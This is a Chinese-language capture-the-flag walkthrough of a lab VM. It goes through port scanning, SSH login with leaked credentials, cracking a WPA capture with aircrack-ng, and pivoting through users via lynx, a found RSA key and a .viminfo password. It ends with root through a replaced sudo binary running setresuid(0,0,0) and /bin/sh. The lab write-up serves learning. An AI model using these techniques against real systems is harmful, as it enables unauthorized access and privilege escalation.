kali攻击机ip：192.168.181.129
靶机ip：192.168.181.156

开启靶机的时候有个信息，可能是账号和密码

nmap -p 1-65535 -A 192.168.181.156

只开放了ssh

查看漏洞

searchsploit  OpenSSH 7.6

一个用户名枚举漏洞，看了下还是不知道有啥用，先放一放

用开机时候的账号密码尝试登陆ssh，成功了

查看目录

查找suid命令，没有意外的话好像是没啥好用的

查看用户目录

先看看bluepill

有个网址，打开是啥玩意

再看看redpill，step2:Password1 ,可能也是用户名密码

cat /etc/passwd

真有这个人

但是没有权限进去step2的目录

还试了试ssh登录step2，可惜密码错误

只能再找找信息

查找所有人可读写执行文件

find / -perm 777 -type f 2>/dev/null

.cap文件,又是数据报，还有一个txt文件

cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

应该是密码字典

(86条消息) scp命令传文件_scp传文件_D2cOneluo的博客-CSDN博客

将文件传到本地

例：scp -r root@192.168.1.1:/data/wwwroot/default/test /Users/mac_pc/Desktop

 scp -r start@192.168.181.156:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt  /home/user/Tr0ll3 

 scp -r start@192.168.181.156:/var/log/.dist-manage/wytshadow.cap  /home/user/Tr0ll3

发现所用的传输协议都是802.11，这是一种无线协议，aircrack-ng就是基于这个协议工作的

Aircrack-ng

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上（设备列表请参阅其官方网站）并嗅探802.11a，802.11b，802.11g的数据

单纯密码破解不需要插网卡

aircrack-ng -w gold_star.txt wytshadow.cap

得到一个结果

尝试登录，成功

查看目录文件，发现一个叫做oohfun的可执行文件

一直在输出这玩意，ctrl+c暂停

sudo -l

查看可用root权限命令

8080端口开放了，应该是网站可以访问了

很怪，返回404，难道是网站配置有问题？

查看nginx网站配置文件

发现只允许使用Lynx浏览器查看网站

初次使用lynx需要安装

apt-get install lynx

lynx 192.168.181.56:8080

又得到一个账号密码

genphlux:HF9nd0cR!

登录ssh

查看root权限命令，又开网站？套娃呢，不会吧

查看用户目录

cat maleus

查看maleus文件，发现是个rsa私钥

下载到本地（方法同上）
尝试私钥免密登录maleus用户

提示maleus文件权限过大

修改权限，600权限是当前文件拥有者具有读写权限

chmod 600 maleus

ssh -i  maleus maleus@192.168.181.156

登录成功

查看目录，发现一个可执行文件，但是要密码

查看.开头文件，发现一个.viminfo

cat .viminfo

发现密码

B^slc8I$

再次执行文件，显示密码错误，看来密码不是用在这的

sudo -l

输入密码，正确，这是maleus的登录密码

原来刚刚那个文件原来有root权限

那这就好办了，这个文件没法用也不能写入，我们就把这个文件删除，然后写一个路径一模一样的文件，写入我们需要的提权代码，以此替代这个文件，然后sudo执行，不就能完成提权了吗

新建一个提权命令的.c文件

 vim /home/maleus/dont_even_bother.c

写入提权代码，内容如下

int main (void){
       setresuid(0,0,0);     
       system("/bin/sh");
}

setresuid(ruid,euid,suid)被执行的条件有：

①当前进程的euid是root

②每一个参数都等于原来用户三个id中的一个

删除原来的dont_even_bother，gcc编译我们的.c文件替代它（记得名字要一模一样）

 rm dont_even_bother

gcc dont_even_bother.c -o dont_even_bother

sudo /home/maleus/dont_even_bother

提权成功，找到flag

o了 😃

番外：

• 设置所有人可以读写及执行

chmod 777 file  (等价于  chmod u=rwx,g=rwx,o=rwx file 或  chmod a=rwx file)

• suid提权：在使用有SUID权限的文件或命令时，会以该文件的属主身份去执行该命令。

1. SUID权限只能设置二进制文件
2. 命令执行者要有二进制文件的执行权
3. 命令执行者执行二进制文件时会获得该程序的属主身份
4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限，则普通用户在执行该程序过程中，是root权限

• sudo -l：sudo 是一种权限管理机制，管理员可以授权于一些普通用户去执行一些 root 执行的操作，而不需要知道 root 的密码，sudo -l列出了可用root身份执行的文件